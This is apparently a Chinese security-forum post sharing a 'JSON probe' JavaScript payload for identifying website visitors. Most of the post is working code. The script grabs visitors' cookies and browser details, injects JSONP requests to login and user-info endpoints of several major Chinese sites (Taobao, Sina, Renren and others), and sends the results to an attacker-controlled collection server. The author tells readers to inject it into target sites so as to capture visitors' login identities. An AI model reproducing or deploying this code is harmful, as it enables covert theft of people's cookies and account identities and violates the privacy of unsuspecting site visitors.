JSON探针—定位目标网络虚拟信息身份
11月啦,放点东西出来 给wooyun的伙伴们分享下,其实这个技术已经很成熟啦.不过还是有不知道的童鞋吧。
BTW看了看我的注册时间,数数手指也有3年近4年的样子啦…也见证了wooyun的成长过程.
从当初的rank榜单top10到现在,感叹,弹指一挥间..不过我相信在wooyun这个平台上的帽子们,无论白帽黑帽,只要是会捉老鼠的都是好帽,所以说,我坚信,大家做一件事情,都不忘初衷…坚持!废话是不是很多?哈哈..
看看下面部分的核心代码,我也就贴部分啦,其实实现起来很Easy,需要一个后端去接收。
它的用处呢,标题大家也看到了,至于能扩展到什么程度,怎么使用,那就看大家的思路啦。。。
window.onerror=function(){
return true;
}
http_server = "http://lemon.1nlab.com/index.php?do=api&id=lemon&content=";
var info = {};
info.browser = function(){
ua = navigator.userAgent.toLowerCase();
var rwebkit = /(webkit)[ \/]([\w.]+)/;
var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/;
var rmsie = /(msie) ([\w.]+)/;
var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/;
var match = rwebkit.exec( ua ) ||
ropera.exec( ua ) ||
rmsie.exec( ua ) ||
ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) ||
[];
return {
name: match[1] || "", version: match[2] || "0"
};
}();
info.url = document.location.href;
info.ua = escape(navigator.userAgent);
info.lang = navigator.language;
info.referrer = document.referrer;
info.location = window.location.href;
info.toplocation = top.location.href;
info.cookie = escape(document.cookie);
info.domain = document.domain;
info.title = document.title;
info.screen = function(){
var c = "";
if (self.screen) {
c = screen.width+"x"+screen.height;
}
return c;
}();
info.flash = function(){
var f="",n=navigator;
if (n.plugins && n.plugins.length) {
for (var ii=0;ii<n.plugins.length;ii++) {
if (n.plugins[ii].name.indexOf('Shockwave Flash')!=-1) {
f=n.plugins[ii].description.split('Shockwave Flash ')[1];
break;
}
}
}
else
if (window.ActiveXObject) {
for (var ii=10;ii>=2;ii--) {
try {
var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');");
if (fl) {
f=ii + '.0';
break;
}
}
catch(e) {}
}
}
return f;
}();
function inj_script(a, b) {
var o = document.createElement("script");
o.src = a;
if (b) {
if (!window.ActiveXObject) {
o.onload = b;
}
else {
o.onreadystatechange = function () {
if (o.readyState == 'loaded' || o.readyState == 'complete') {
b();
}
}
}
}
document.getElementsByTagName("body")[0].appendChild(o);
return o;
}
function json2str(o) {
if(typeof o == 'string') return o;
var arr = [];
var fmt = function(s) {
if (typeof s == 'object' && s != null) return json2str(s);
return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s;
}
for (var i in o) arr.push("'" + i + "':" + fmt(o[i]));
return '{' + arr.join(',') + '}';
}
video_login_callback = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=baidu";
}
e163_comment = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=163";
}
sina_1368631232407449 = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=sina";
}
loginInfoJson = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=taobao";
}
jsonp1368705676193 = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=mop";
}
jsonp1368751970360 = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=dangdang";
}
jQuery1368758656634 = function(o){
new Image().src = http_server + escape(json2str(o)) + "&content2=renren";
}
window.onload = function(){
new Image().src = http_server + escape(json2str(info)) + "&content2=info%20";
try{
inj_script('http://baike.baidu.com/api/login/?callback=video_login_callback');
}
catch(e){}
try{
inj_script('http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment');
}
catch(e){}
try{
inj_script('http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449');
}
catch(e){}
try{
inj_script('http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713');
}
catch(e){}
try{
inj_script('http://passport.mop.com/common/user-info?callback=jsonp1368705676193');
}
catch(e){}
try{
inj_script('http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360');
}
catch(e){}
try{
inj_script('http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639');
}
catch(e){}
try{
inj_script('http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1361671333278');
}
catch(e){}
try{
inj_script('http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368893252433&var=tianya_msg');
}
catch(e){}
setTimeout(function(){
var o = [_passport];
new Image().src = http_server + escape(json2str(o)) + "&content2=sohu";
}
,3000);
setTimeout(function(){
var o = tianya_msg.data.list[0].toUserName+'|'+tianya_msg.data.list[0].toUserId;
new Image().src = http_server + escape(json2str(o)) + "&content2=tianya";
}
,5000);
};
我就不逐行去做解释了,大家可以看到里面有很多国内的大型SNS站点,购物站,等等。
这里你可以自定义添加你想要的,然后呢,你把这段代码注入到目标网站上,那么访问者访问以后。
假设他之前有访问过这些代码里面自定义的网站,比如baidu空间,当当网,新浪微博,淘宝,等等网站。
那么他之前的登陆信息就会被我们截获到,并且记录到我们的后台。也就是最开始那段http_server那个地址里面去… 好了,洗洗睡了。。。欢迎各位 拍砖…